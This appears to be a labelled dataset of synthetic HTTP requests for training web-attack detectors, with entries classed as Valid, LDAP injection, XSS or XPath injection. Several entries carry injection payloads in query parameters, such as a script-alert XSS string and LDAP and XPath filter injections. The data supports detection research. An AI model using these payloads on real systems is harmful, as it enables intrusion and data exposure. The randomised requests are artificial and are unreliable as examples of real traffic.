~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20900
Start - Id: 19600
class: Valid
GET /7tbsH/ldI4ys8r/vee8/do/algJ0_2FuSe6/lKQKhu.tiff?dIa=jBPjNZEXcTxE&ekqfdkrsdt5orcI=4016&iroiaakf5zhma=%2Boeb&aatorthlEn=9321701&aOUsW@libe2Ui=lJtHnD4PagxQ&hsheNa=mh+%3Fstyle&1eover13h9cdr=42075&GlinkIZCI=sC&ntsIcyqq=Y3sltnTttEdljci&nx=68686783&IZOODx_f=l%7Co5lneopengIh&htaccesprocessing-instructionrLL=rh&iatkHcgy8ahin=in+aibodyh5tdocument%5Corrrdehi%2F&H2sock_stream4=huJL&f4d0gFYxEZstmp=drJgMnl7 HTTP/1.0
Host: 194.118.180.211
Connection: keep-alive
Accept: video/mpeg, video/*;q=0.6, video/mpeg;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: amhMgh-dsagh;q=0.8, hsemc-unuonpn, bseo-tOisjert
Cache-Control: max-stale
Client-ip: 147.175.11.94
Cookie: iobad=3183;svdRAneeef=tmte
Cookie2: $Version="175"
Date: Fri, 18 Jan 08 11:52:19 UTC
ETag: "vfEVZCt5Z5rkHvk@rL5s"
Expect: ab2x=Hdresey
From: ew6u@ito9.it
If-Modified-Since: Mon, 07 Jun 04 20:43:10 UTC
If-Unmodified-Since: Tue, 18 Sep 07 19:10:16 CET
If-Match: "4Vl2g7@RetRLomXdFZ"
If-None-Match: *
If-Range: "oN7qm0OeiS4-EKei"
Max-Forwards: 8
MIME-Version: 1.6
Pragma: yrta='ieiufhn'
Proxy-Authorization: hnwc eonohrme=eToyi
Authorization: Basic b3BpbWdjZDplbm1p
Range: -4,298-
Referer: http://www.Oaed.cz/onEec/Aift1D.jsp
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.4 (X11; U; SunOS sun4u 0.2; Pw-en; rv:0.1.3) Gecko/82930577
UA-CPU: PowerPC
UA-Disp: 3312,033,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 4605x2042
Via: 4.1 86.107.240.29:33, FTP/6.6 239.242.211.210:793
Transfer-Encoding: iolquo; K1Naow=jeprmrb
Upgrade: lrcgo/8.5, IcH/3.1, nms/4.4, GsEeQ/6.0
Warning: 605 www.dnne.shtml "oI3esi8tekNt" 
X-Forwarded-For: 240.111.161.144
X-Serial-Number: 1701611
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19600
Start - Id: 17827
class: Valid
GET /fCwfmuAUTWFAU2UOkFIZ/s9ankyrmveteahh/u7P96eLvMC/Nefs.mspx?NUIokl=ioTtfpatig&wszhaxoebgln=vQPppjN&Dc6te4nzoetsf=hctnxote&khyrtncottor=xa&yrowafikD0oftr=ds0aa2&imhEi0nhsaJl2Ar=28675&wht=sZ%40RZ&eumi8jatmt2s=d%25lreome&hot=weHs9lnwa2IaUse HTTP/1.1
Host: www.utnht.cz
Connection: close
Accept: audio/*;q=0.8, application/postscript;q=0.9
Accept-Charset: windows-1258;q=0.8, iso-8859-7;q=0.4, x-mac-japanese
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 213.113.216.159
Cookie: cvbtimgrqtrve=62021;loVssGiu=05663822;3dfdede=a@pLXZ_-;eseojedevIm=1
Cookie2: $Version="799"
Date: Sat, 12 Nov 05 19:32:54 GMT
ETag: "8BT5Ni58jyRMhwIlGa"
Expect: ugelm
From: bhodzdea@setynert.net
If-Modified-Since: Tue, 21 Nov 06 16:44:54 GMT
If-Unmodified-Since: Wed, 14 Jan 09 13:48:03 GMT
If-Match: *
If-None-Match: "l1uGzaB9eWylYGKG.t6"
If-Range: Fri, 13 Feb 04 15:42:09 UTC
Max-Forwards: 9
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest nonce
Range: 4-20674
Referer: http://www.dooxa6e.ch/3emc43o/6tnt/Dregtp/sbrEl/49iondre.jpg
TE: gzip;q=0.4,gzip;q=0.5
Trailer: Host
User-Agent: e8lwa8rbleltsio
UA-CPU: StrongARM
UA-Disp: 2638,7610,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 223x6098
Via: 0.3 www.ctrenlrh.css:4, 0.4 123.232.222.40, HTTP/2.3 52.238.68.151
Transfer-Encoding: deflate
Upgrade: Wlr/6.5, mnotTs/5.2, da54o/9.9
Warning: 772 19.4.250.196 "a2huUdChiyr6hamrt" 
X-Forwarded-For: 65.146.203.44
X-Serial-Number: 58227731
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17827
Start - Id: 19789
class: Valid
GET /nwPAv9AFH4lNia21B/auJg-3/aNRjKvk8vjxynn.3nV3K/eolee/o5hK9y/2eBg5sOlhekQY/ssieodhnaetnuMba7eeE/BLS1NsL3hLR@_gP/-Z4/lhmvyRZGTT/egJU5@4uFYZy/4sbniiga2etpxidalpec.aspx?NixQHOWG=5207669854&aha=+b6eT%3Bsnjc%3E%5Bh%7Cm%3Ahe7&h6GnmoIhu=ywheredahome1&2mvpassthru=3223&sE9ceygoibgas=k5Fuk.Rocl&fdnco=oXXax10t5Xu&cTsc=euommeFty6tCanduac%24%25ez&ltgttt2dned=m7tn%25&lrnua1NEdchm3ne=e9gaafejsnab&n3iarnsatet=lo%3Bt&honhAuisai3ehte=md0&TJgcntds6tihhnT=slnw&ntah0tLcgcraish=as6ENc HTTP/1.0
Host: 185.49.127.6:80
Connection: keep-alive
Accept: image/*
Accept-Charset: cp-950;q=0.1, windows-1257
Accept-Encoding: *;q=0.4
Accept-Language: ef-dsrsxh
Cache-Control: min-fresh=62470
Client-ip: 218.240.255.10
Cookie: tflr8ondllhS=nfFic1Qha;ty2u=etleWi
Cookie2: $Version="712"
Date: Fri, 10 Sep 04 11:04:14 CET
ETag: W/"bWqhNQazozGGLlK2Sa2"
Expect: 100-continue
From: ilotit@a0vnis.fr
If-Modified-Since: Wed, 26 Oct 05 16:02:54 GMT
If-Unmodified-Since: Tue, 30 May 06 22:47:14 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 28
MIME-Version: 6.2
Pragma: sT='ibsn'
Proxy-Authorization: Basic dHRlazpqZUVocg==
Authorization: ocni egNmqa=nsmntpd
Range: 429206-7,67-5603
Referer: /ezvenue/cftmltc/sh9sa2/Csga/etiEe.mp3
TE: trailers,chunked;q=0.4,deflate
Trailer: Upgrade
User-Agent: Mozilla/4.2 (Machintosh; U; Mac OS X 2.7; ia-Nu; rv:1.7.8) Gecko/76871787
UA-CPU: 68000
UA-Disp: 658,604,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 9755x916
Via: 7.9 190.196.13.226:4333
Transfer-Encoding: deflate
Upgrade: I4m9/3.2, eTss/9.1
Warning: 416 www.geeewv.png:396 "qliehpR7srsnhchrotf" 
X-Forwarded-For: 59.255.139.123
X-Serial-Number: 212517098577973192
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 19789
Start - Id: 37246
class: LdapInjection
GET /2shutdownwid8n@Gg9b7rstdinz/eO/6DRM/ognpatecrsemy5t9nr/shewnetnu/drrirytEtnwcnoes/kee.tiff?NT0cDJacceptnfOF=138695082&wcatUzz=dmH_g&t1lTs=cJXD0&Ees=ehdoi0ma21shumta&ird4ksfotUq=tWF.ZQ&0zsautyt=imss3iw&utn=Yo4a%2Bj%7Cy+teefl&igiebeetsefet=%29+%28+++%7C++%28displayName%3Dhad*%29++%28name++++%3D+++had*+++%29%28mail%3Dhad*+++%29&ru=rs3O0-hpD&lHle=sC6&eanede=et3Feoptavotgaeen%3Evoc&oyareNneEolwot=n+raD&AImidura=o%3FeRe%40yt+5onX&Ax1ao=3490 HTTP/1.0
Host: www.xy6o6tesol.com
Connection: sto8
Accept: audio/*;q=0.7, audio/*;q=0.0
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: dr=aAels
Date: Fri, 05 Mar 10 06:41:40 CET
ETag: W/"8iqS6XOVjdhdKDP"
If-Match: *
Max-Forwards: 194
Authorization: Basic YWFjdHJzODpvZm9kcw==
Referer: http://EmsS4.de/knegepj/toaaae/isnf6/oaec0t.php4
Trailer: Via
User-Agent: Mozilla/9.9 (X11; U; Unix 0.4; el-1y; rv:6.5.0) Gecko/72199095
UA-CPU: 68000
Via: 0.8 40.69.88.183, FTP/1.4 www.eeylu7t.gif:4876, 3.3 www.aooza3.jpg
----: ------------------------------------------

null

End - Id: 37246
Start - Id: 47199
class: XSS
GET /1U7yCisO5YYyxwVV/AbinQAnzj3ZevalV/tOam/nz4eepIrng8eT/gyxbwpCOX4MvFypV/unlboot.iniFWID0E/pe/lIybD7.dll?rsivtEmiFrs=15264&NmochaG4=235219&fhrn0g=%3C%21%5BCDATA%5B%3C%21--%5D%5D+++%3E%3Cscript%3E%5Balert++++%28%27s1%27%29%3B%5D%2F%2F--%3E%3C%2Fscript+++%3E&76ieAp7ieeb9=i6&UblrteaJuuajc=ls%3E&ep=idoau6nosyieove&diaetry=o%24yj1i&beeze=d1vEhi&rcsBnskhpauerys=autoexecwejT%7C%25isUr%3C75Rnrsor HTTP/1.0
Host: 176.198.173.60
Connection: Nytvpt
Accept: application/postscript;q=0.1, text/*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: g-deoa, elbb-lqat, usy8hnoh-f;q=0.8
Cache-Control: no-cache
Client-ip: 63.161.16.102
Cookie: 6sl=778081744
Cookie2: $Version="4"
Date: Wed, 04 Jun 08 04:55:59 UTC
ETag: W/"M.D_V9Hhyz7aLO5"
Expect: 100-continue
From: oUzNrsR@euuilaosen.cz
If-Modified-Since: Mon, 31 May 04 11:09:44 CET
If-Unmodified-Since: Sat, 26 Jun 04 10:15:04 GMT
If-Match: *
If-None-Match: *
If-Range: "K6hLdMPJPUPnTW8"
Max-Forwards: 7
MIME-Version: 9.5
Pragma: lttyp9=a
Proxy-Authorization: Basic OG53NmFmOnNoc0FuYXA=
Authorization: Digest algorithm=MD5-sess
Range: 676-108618,2650-4238
Referer: http://seeua.de/2slhen/ylteikc7/yexv/teqwoR.js
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/2.6 (compatible; Konqueror/3.1; Linux i586; HaynzEjHio; ofarrn)
UA-CPU: 68000
UA-Disp: 4828,524,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 286x017
Via: HTTP/0.9 0.129.47.217:19015, HTTP/2.2 195.32.189.7:0, 1.5 www.piIriuf.js:824
Transfer-Encoding: 5ore; EErEntt=tRtocaD
Upgrade: urd/1.0
Warning: 683 181.248.214.19 "qlt9unMovxwdh" "Tue, 18 Jan 05 01:02:04 UTC"
X-Forwarded-For: 25.149.50.16
X-Serial-Number: 533969856895
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47199
Start - Id: 5009
class: Valid
POST /1d/tj/inputxtpOKwfxMid4/6ps6-x/ymzBUN/e1/1C.mfWINjBlhWT7W/aTEdFXY/8AvQS-yVdvZDA/sR2htelnGnxuupP9oaie/logxB2yVlR.jpeg? HTTP/1.1
Content-Length: 298
Content-Language: slees9nm
Content-Encoding: deflate
Content-Location: http://psfytun.be/lineto/jhpeuiCT/aerh/dogn/rnhn.swf
Content-MD5: ZTR1U2FlaXRodXNpYWNuZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 08 Nov 08 21:15:07 GMT
Last-Modified: Tue, 17 Nov 09 07:36:23 UTC
Host: www.Oret.com
Connection: close
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 111.197.53.14
Cookie: oymru=enRnl;1LDD6=eN6mKVBhZQP
Cookie2: $Version="12"
Date: Tue, 22 Mar 05 10:46:29 UTC
ETag: W/"RxD8upuX4WwDQOW"
Expect: niosjao
From: anypee@kdrqiteI.it
If-Modified-Since: Mon, 26 Jul 04 03:34:39 GMT
If-Unmodified-Since: Sun, 16 Aug 09 09:06:49 GMT
If-Match: "x1VMoMP8fPZHl1qb"
If-None-Match: *
If-Range: Sun, 04 Oct 09 18:06:01 UTC
Max-Forwards: 8775
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: n0uh sdoatsos=ryyw9
Range: 8-,-38,-9633
Referer: /oqu5a4I/Eayre/e62h.mpeg
TE: trailers,chunked;q=0.3
Trailer: Accept-Language
User-Agent: aeeDq5mi
UA-CPU: StrongARM
UA-Disp: 770,4092,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5947x3710
Via: 3.9 www.dSsi.jpeg:807, 0.4 57.250.88.49, tIu5/7.6 www.mdra.jpg:52
Transfer-Encoding: gzip
Upgrade: lda1/1.1, roi/5.3, aodtys/7.9
Warning: 459 www.stfkt.css:00 "enygOrouo8ussoypt" 
X-Forwarded-For: 3.243.104.229
X-Serial-Number: 03530
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

dh3ee=892929&ohJ-Mr=LrekieU5qcin&nkWu6vbscriptf=6350049112&jqNR=93615&4KEbody=8026052&yR3cSFG0u=7isi7cznH&s8hesiu7=(&dia0nmetgseyde=llW04-0N&eSma=3484555073&4nAor=7557452&g5ohTndtnsx=%uestEoHYl)[l&rorm=cE&bre=@sTeenrar1nnunionwindow.openEaydd&aboot.iniDO=rdenn1rrbeTP0h&ns5mntak=scriptm-l

End - Id: 5009
Start - Id: 1419
class: Valid
GET /tfptiri/ni.SQhL0/MO4ftpnF_PSJjw/t.qgEy/NPL4/tp9cnu3eHrtiteo/fiOhw16nwn8xAn5ona/6lfrrnumotdnoe/yNEmToYrNiLhOoLLf/vWvAdysbvwdivbAservices.bin?tPauad1b=enwsKhtaiipnrkor&nfjeni=isbmesdEeDif&zi=peoa%24tr&ihiSegd6rriv=fteoe&rDSX7zMJ=zt4nOsas%3Cons%26+%26&m0Gh=n%40jy&3xmSwlmnEed=2Tl%26i%5B%3Eaeqs&i3nodhlltnstedc=tm&hc6sRT=hvbbF HTTP/1.1
Host: 139.69.15.141
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: min-fresh=9
Client-ip: 145.43.119.173
Cookie: OchBpezt=tt r1;matniuslx=hwp-astpwb
Cookie2: $Version="432"
Date: Sat, 31 Mar 07 03:00:21 CET
ETag: "3YvwRJfRSCNjWREyB9"
Expect: 100-continue
From: pa8eeese@safsis72.st
If-Modified-Since: Sun, 30 Apr 06 16:05:37 UTC
If-Unmodified-Since: Fri, 18 Jan 08 19:43:52 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 02 Sep 04 01:22:46 CET
Max-Forwards: 9
MIME-Version: 5.9
Pragma: FaaOvTif=ioaae
Proxy-Authorization: Digest algorithm=MD5
Authorization: NTLM d1dhY2R0Y3VpYldyd3NXeWhlcjNFdGU0dWdqZGhudHdnOXFh
Range: 6-15763,0058-47
Referer: http://nsrnuvu.uk/dameeqn/dbyrr/willenc/txttuih/lrm2a.css
TE: deflate;q=0.2
Trailer: Date
User-Agent: e1_UF@Pd7 http://www.Heofeh.biz
UA-CPU: x86
UA-Disp: 592,845,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 226x4570
Via: FTP/5.6 216.197.158.192, 3.4 www.x7rreoa.jpg, 0.5 95.110.194.210
Transfer-Encoding: deflate
Upgrade: ntgotn/8.4, Hnr/6.1, oeiiu/9.6, t1ri/3.8, jueb/7.0
Warning: 770 www.eTeDmS.jpeg:49 "e1Lit6sroulO1cet3" "Tue, 08 Sep 09 01:51:56 GMT"
X-Forwarded-For: 166.217.103.151
X-Serial-Number: 1347008
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1419
Start - Id: 23633
class: Valid
GET /_cFoJDPRIydc0/hO_RMme8eGFgvB@E_1T/sresTa/r.dropeJAu89KQT4/-5DWIU/4uXuNnzd0A6qpzYNc/w5eeira9An/t4im1nfheye9/x0/hhTnt9toaysdio/Q6kpqHbNxp.tiff?ctnhqeloe=+l&edelgi1ieist5=wt%29ncbgsound&tatfecw=tmpaye&tc2ee=V%7Cstq6&leieUne=927414&teeNtc90y7a=stron9ten%7E&omKennep=1&ooTesyz8=289699&Pe=oehmemitea&sbmeIdag62efeas=Nm%3Fs&dkegtaroujwnw=8811638&e9ajefldy=eOah&R2wzwwNto1=19870&berwearpatd=rrEE-JCM HTTP/1.1
Host: 119.114.197.131
Connection: rsdb5eo
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.2
Accept-Language: faltNdrt-oe;q=0.0, T2-yolwTtn, snue-Kede8uTr, oen-thuh;q=0.1
Cache-Control: max-stale=1770
Client-ip: 88.47.180.4
Cookie: e3d=2O-2c9;Hnq=bodyjtpir2@E;iohh=1030475418;gjitqnwts=3;oilemld=327099
Cookie2: $Version="41"
Date: Mon, 13 Jul 09 09:05:16 UTC
ETag: W/"_aZ@X5mjior@uCqlK5S3"
Expect: 100-continue
From: emWo@1nea.net
If-Modified-Since: Thu, 17 Jun 04 03:35:37 GMT
If-Unmodified-Since: Sat, 18 Feb 06 17:18:04 GMT
If-Match: "g1ih8_dIWyv9DD866qs"
If-None-Match: *
If-Range: "kgWx5IB-dbvyiUjuF"
Max-Forwards: 71
MIME-Version: 4.9
Pragma: 4ta7r='2ernce'
Proxy-Authorization: ts2t eudaha=Usambx
Authorization: chqs7 qhle8=fa27aSkn
Range: 13344-7165,79151-
Referer: http://eremtlft.com/srqc/dttrt.bin
TE: trailers,gzip,chunked;q=0.7
Trailer: Upgrade
User-Agent: JTddht/0.2.4
UA-CPU: PowerPC
UA-Disp: 307,9074,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 361x375
Via: HTTP/8.1 93.247.41.189, 4.4 www.vANIdwt.jpeg:576, 8.3 64.201.100.83
Transfer-Encoding: deflate
Upgrade: nessN/8.6
Warning: 398 www.tooa.css:63777 "eytbc" "Tue, 06 Sep 05 04:00:11 UTC"
X-Forwarded-For: 151.73.41.255
X-Serial-Number: 13224
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23633
Start - Id: 15941
class: Valid
GET /dtM_CDqFsOiD/aesM/eNZ/i-rl/xPN0P8XXKyYpYyP.vqUY/jpChsrR/eI1aee27hanp/teeaoaesnsn4kr/opnd1nxHURz.html?0tEgehhahIsit=7l+&LVHOR=753&iCD4logYMVea-=%5D&81mochaK6c3KXR=23494&u@CorVCeS=16 HTTP/1.1
Host: www.ifehse.net
Connection: close
Accept: text/*, audio/*, image/gif
Accept-Charset: windows-1258;q=0.1, us-ascii, x-mac-arabic
Accept-Encoding: gzip
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 240.237.65.163
Cookie: 6hh=snoMPl;ssBR2g=5;41=dei;liswbwdkua4amh=ewhere4wnmochaiiErO;rebd9ltSn=wAe
Cookie2: $Version="0"
Date: Wed, 05 Oct 05 08:42:57 CET
ETag: W/"BMtPzHuJJL8hG6tFi"
Expect: 100-continue
From: foupIigo@8aw9mD.net
If-Modified-Since: Tue, 04 Jul 06 19:59:48 GMT
If-Unmodified-Since: Mon, 28 Jan 08 09:13:56 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 017
MIME-Version: 0.4
Pragma: StwSTs='emEfnshF'
Proxy-Authorization: Basic OU5Ucmk1OnNzRWxh
Authorization: Digest opaque="Ns8fivs"
Range: 638-
Referer: http://e5ietio.org/enaza/onotso2s.exe
TE: trailers
Trailer: Accept-Charset
User-Agent: e4oavaact/5.5.3.9.2
UA-CPU: Sparc
UA-Disp: 9788,9519,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7490x6757
Via: 1.1 203.14.199.92:95068, HTTP/3.7 51.248.183.191
Transfer-Encoding: compress
Upgrade: nbf6oi/8.6, oqeh/3.0
Warning: 043 43.221.213.2 "aosrvsdSerhlegrta" 
X-Forwarded-For: 249.146.24.22
X-Serial-Number: 902795825
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15941
Start - Id: 6670
class: Valid
POST /U1W_MzIi/divcp17hSt/hRz3Duhf-rSi8S29J/hs.W..htm? HTTP/1.0
Content-Length: 168
Content-Language: T0ad
Content-Encoding: compress
Content-Location: http://www.gqte3.st/eiSe/hou5wrrs/aNoe/snatee/dsNonfp.bin
Content-MD5: MmNoYXBoVWRFdjJ3djg3cw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 15 Dec 07 19:41:56 GMT
Last-Modified: Wed, 14 Apr 04 19:59:25 CET
Host: 254.87.98.184
Connection: keep-alive
Accept: image/*;q=0.1, video/*;q=0.0, text/xml;q=0.2
Accept-Charset: *
Accept-Encoding: identity;q=0.6, gzip;q=0.5, gzip;q=0.9
Accept-Language: psMabra-i, a-eEhtai
Cache-Control: min-fresh=42851
Client-ip: 3.121.174.35
Cookie: hSdCi=itevalnedF;avtscsFwsb=950242
Cookie2: $Version="10"
Date: Wed, 29 Apr 09 14:59:07 UTC
ETag: "vYsxOSquYPtEQpUW"
Expect: 100-continue
From: kmoes@oyExaqk5j.ch
If-Modified-Since: Fri, 15 Sep 06 01:18:19 GMT
If-Unmodified-Since: Sun, 26 Mar 06 09:54:08 CET
If-Match: *
If-None-Match: "PadfirSYfyyYUnANxJS"
If-Range: Sat, 14 Oct 06 20:45:50 UTC
Max-Forwards: 987
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: Basic NG1kanBpOmllSGVocmVp
Authorization: Digest uri=/hsnaio/1nnwO/sdgtkre0.fgf
Range: -70
Referer: http://Dxsu.uk/ntfet/a9isau/hsiIul/now8lawe.bin
TE: trailers,deflate;q=0.8,deflate
Trailer: Accept-Language
User-Agent: Mozilla/0.8 (Machintosh; U; Mac OS X 8.1; h6-w8; rv:2.4.2) Gecko/94831574
UA-CPU: Sparc
UA-Disp: 7591,1766,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 075x397
Via: FTP/6.9 www.iWnobs.js, 6.5 249.220.131.54:8, RwgcSh/5.6 www.Ho2eb.shtml
Transfer-Encoding: rT4hn
Upgrade: ouir/8.6, le8mS/3.9, uip/7.9, oinia/7.0, igMoc/1.2
Warning: 713 www.8inlfdnc.js "eao0a8Dsgeo" 
X-Forwarded-For: 239.4.241.123
X-Serial-Number: 1883916310
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

XV2eNvYbodyh=5366505&B4@5Xd=k5<null/&bgwtKcyWL0dfA=fasgi 8ulTdobjecth&a5feu=730&es=2425082765&aeyloca68aa8=rmrt&uarocyo=tg7<lspasswdx\\ytustyleit$Ta/input

End - Id: 6670
Start - Id: 8242
class: Valid
GET /esw/St/mY/h9K63Yd7HT3HeH/lowi-jvufqI/a.FbEbGp4SvNwm8XSvt.pl?feqmc5IaCtet=%7Errtgu&onccal1rntt8Rah=1noxmgOohcd&wtexhokrg7=+7ii%28&ltapt=ilikehnoathlink&bieeYyELcv=vo&7x1yhotl4ttorD=e1+aoe%3A5fypt+nt&s0Dny=9acLSuwuQS&ptt=qrCrtelnet++o6araegroup+byp%3D&W-MNlsand=O-ier+0vcmddo&RDcmdOP6fhk=221953&t.hOacceptO-=ixnjcc&9oindtiem=x9%3Ftb&flocationX-tWPRx=sPdtjaiT8xsneet&M.SG9AQj-Y=R&rb4n=dqmpeIud HTTP/1.0
Host: www.aSottt.ch
Connection: keep-alive
Accept: audio/*
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: 2xta-g;q=0.9, dTcn-maihBS, fmntnd-ua;q=0.6, oeo-xlanoe;q=0.8
Cache-Control: max-age=71979
Client-ip: 163.254.45.151
Cookie: sTne= f6nF;hpdeletea=nph-5trO@sslsdlgroup by\zlink;wqL8r=si0a;ijuwesUqh5gt=88WF_g;roer9mnesel=9170306
Cookie2: $Version="79"
Date: Mon, 31 Mar 08 08:33:01 CET
ETag: W/"hea.MfjvUK@lxe0biG"
Expect: uad2d3k=fotvl
From: seep8@iavee.it
If-Modified-Since: Thu, 17 Mar 05 07:46:53 UTC
If-Unmodified-Since: Tue, 12 Jun 07 15:27:21 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 17 Oct 09 11:26:26 UTC
Max-Forwards: 077
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Basic ZWQ2M3Q6ZWlsYw==
Authorization: re6i beTyuwz=d8ce4ooe
Range: 62861-,40-66
Referer: /nbsf6de/le4utm52/deodu.msf
TE: chunked;q=0.7
Trailer: Pragma
User-Agent: Mozilla/2.7 (Windows; U; Windows NT 2.7; eo-tt; rv:8.2.6) Gecko/08259858
UA-CPU: StrongARM
UA-Disp: 260,910,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 5572x247
Via: HTTP/7.2 127.36.172.7, aHdsus/6.9 www.ey3r.shtml, 0.8 www.ueefhtnc.css
Transfer-Encoding: imWIds; eIiwtme=tdtxwrh
Upgrade: rht7s7/2.6, dxceec/0.8, Fr2jv/6.2
Warning: 350 www.rvsnz.jpg "iihmtwbmshrEsre" "Tue, 20 May 08 02:04:29 UTC"
X-Forwarded-For: 176.93.53.162
X-Serial-Number: 9806136470509307613
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 8242
Start - Id: 35730
class: XPathInjection
GET /hb2ev/ir4o2a8ae.shtml?Vzbetweenne2LCv=10696905&deeTeelqsUot=Ftamatbashbu+&fheey7r2Aa=pkselike+lretehu&hog5ieae=hthc9itMogt1t7e&wE5K7ncxtermq=014&H8Py0=4476112&ogNilleieon=ah0&mei0atshruhg=y%3Bm&itfua=ev6ndmdeletedst%7C%2Be&otRN=Bt0in&rs=%28i+++%3C+++count%28rlir%2Fchild%3A%3Atext%28%29%29++and+++j+++++%3C+count%286hcm3y%2Fchild%3A%3Acomment%28%29%29+++and+++++k++++%3C++++count%28rLayoj%2Fchild%3A%3A*%29++++%29&7mamRw3gblmtr=mZ7sC8&m3e9ehae=hlKmYIuzq6q HTTP/1.0
Host: 14.63.53.228:80
Connection: keep-alive
Accept: video/*, application/rtf;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 36.164.45.166
Cookie: rrr1=94796;xhvs-cHI=Jo@hi;ihCmS7SInodeLY=4688481
Cookie2: $Version="001"
Date: Mon, 13 Jun 05 09:18:25 UTC
ETag: "u39oPyKWUUBlk8Zb"
Expect: 100-continue
From: dkgpi@e0eolroeA.ch
If-Modified-Since: Wed, 03 Nov 04 21:14:08 CET
If-Unmodified-Since: Sun, 25 Jun 06 23:14:26 CET
If-Match: "o_b_lmCf8w3dYtr"
If-None-Match: *
If-Range: *
Max-Forwards: 76
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM Z3Ntc2hscmZlTk5vc3JpYWVsYWVubGV0SWVhZ25lTXNueDl3c2VOeXN0cGVybnJh
Authorization: Digest uri=/idrenn.php3
Range: 820401-
Referer: http://www.tljowhs.gov/unasul/eheie.wav
TE: deflate,chunked
Trailer: TE
User-Agent: Mozilla/5.4 (Windows; U; Win98 7.8; o9-Cs; rv:6.2.5) Gecko/73041354
UA-CPU: Sparc
UA-Disp: 453,3007,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 161x6887
Via: nheut/5.6 www.koiaIej.png, 9.7 www.rs08gan.tiff, 5.5 156.74.254.199
Transfer-Encoding: deflate
Upgrade: prjil/8.6
Warning: 495 www.nishee.css "pnuvl" "Sat, 05 Jul 08 22:36:12 CET"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 126041771570096080
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35730
Start - Id: 31068
class: Valid
GET /lyvSOYn_4xcaPCDki/5cYa_qq0SvfpYgaV/tpkNh/eEwv2_ht_uxFgZWVv5Rz/mWjSxBTTji/0P7iF6Jhg6.php3?a9ltwnn=af9CN5qDK&R013f-catECXO=tish2hdIN&54e-1i_htacces=anodeposition&eE=ce7sohlt%7Ce9+lDa&do1=6645943800&Ws6ah=%7En%25Y6a&atmhigmeddeEw=sep2Dcni&aQmuihNgtJa=sH%3FoatT38NhI&hiswizesoe=st8xege&b3=a2esi5Ty04mochap8m&oohHnirzeeq=gq5yw HTTP/1.1
Host: www.0heo.cz
Connection: AEut6u
Accept: */*;q=0.8
Accept-Charset: iso-10646-ucs-2
Accept-Encoding: gzip;q=0.1, identity;q=0.0, gzip, deflate
Accept-Language: *
Cache-Control: min-fresh=46
Client-ip: 226.231.143.120
Cookie: thiTMte=oitselogeUafromtc;nesatffy28Ustow=90817003;uISLb=th\Evnclt-=;9tfgngatd7=?;wVn8c-PRE4=5x.vV14;e2Wiqntsenrdv=&
Cookie2: $Version="69"
Date: Tue, 07 Jul 09 12:23:59 CET
ETag: W/"UHmlLqgMwHtvrSN"
Expect: imamsYsm
From: tyfhs@svdrsronma.st
If-Modified-Since: Sat, 01 Sep 07 07:27:05 UTC
If-Unmodified-Since: Tue, 01 Sep 09 21:21:04 UTC
If-Match: *
If-None-Match: "ODQe2XECcIV7dxtOa2SO"
If-Range: *
Max-Forwards: 97
MIME-Version: 8.2
Pragma: no-cache
